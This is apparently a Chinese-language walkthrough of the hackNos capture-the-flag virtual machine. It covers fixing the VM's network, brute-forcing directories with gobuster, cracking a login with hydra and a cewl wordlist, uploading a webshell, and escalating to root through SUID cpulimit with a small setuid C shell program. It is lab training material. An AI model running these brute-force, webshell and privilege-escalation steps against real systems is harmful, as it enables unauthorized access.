下载靶机
通过VMware搭建 网络问题是个关键点
我们点击开启虚拟机,到开机的页面我们回车选择第二个Ubuntu的高级选项 (如果出不来这个选择界面,开机时按下shift键)
进到高级选项,我们再次回车选择第二个进入Linux内核版本的恢复模式
回车后会弹出选择界面,我们选择root回车
出现下面Press Enter for maintenance后再次回车进入命令行模式
首先在命令行输入mount -o rw,remount / ,否则后面可能无法保存网络配置文件 然后继续输入命令 vi /etc/network/interfaces修改网络配置文件,我看可以看到配置文件中网卡信息与实际信息不符
更改实际网卡名称
第二张情况
开机,按e进入安全模式
找到ro ,将ro及后面内容修改为 rw signie init=/bin/bash
修改完成后,按ctrl+x进入bash
修改网卡配置文件,将配置文件中网卡改为ens33(根据实际网卡修改) vi /etc/network/interfacers
修改完成后,输入:wq保存退出后重启系统 如果发现没有interfacers文件,则按照下面方法 进入/etc/netplan
cd /etc/netplan
ls
nano ls出来的文件
将yaml配置文件中网卡名修改为实际查到的网卡名,ctrl+x保存后重启即可
靶机重启后,我们再次在kali上使用arp-scan -l 命令,可以看到已经收集到靶机的IP
确认靶机后扫描开放端口
扫描目录路径
这里也可以使用gobuster爆破
gobuster dir -u http://192.168.0.4/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
访问
翻翻看有个邮箱地址
可以尝试爆破二级目录
gobuster dir -u http://192.168.0.4/websec -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
发现关键点admin
使用cewl爬取/websec/页面制作密码字典
使用hydra工具爆破密码,用户名就用邮箱名字:contact@hacknos.com
hydra -l contact@hacknos.com -P oshacknos1.txt 192.168.0.4 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V
获取密码
Securityx
成功登录
文件上传点
在Content>>File Manager处进入tmp目录编辑.htaccess文件,将里面的内容全部删除点击Save并进入tmp/media_thumb/目录下上传一句话文件:
开始提权
反弹shell
获取交互shell
查看是否存在可以提权的命令
find /usr/bin -type f -perm -u=s 2>/dev/null
在/var/local/database中发现了经过加密的内容
Expenses
Software Licenses,$2.78
Maintenance,$68.87
Mortgage Interest,$70.35
Advertising,$9.78
Phone,$406.80
Insurance,$9.04
Opss;fackespreadsheet
对密文进行解密,得到密码明文Security@x@
fackespreadsheet
https://www.spammimic.com/spreadsheet.php
查看是否存在可以提权的命令登录用户blackdevil,该用户是在/home目录下发现的,然后用sudo提权
提权方法二:
cpulimit -l 100 -f -- /bin/sh -p
提权方法三:
发现cpulimit 命令,尝试用cpulimit提权
一个用户调整CPU使用的命令,cpulimit`命令主要对长期运行的和 CPU 密集型的进程有用
#include<stdio.h>
#include<unistd.h>
#include<stdlib.h>
int main()
{
setuid(0);
setgid(0);
system("/bin/bash");
return 0;
}
将上面的代码编译为exp,上传之后使用添加运行权限
gcc cpu.c -o exp
chmod 777 exp
使用cpulimit -l 100 -f ./exp进行提权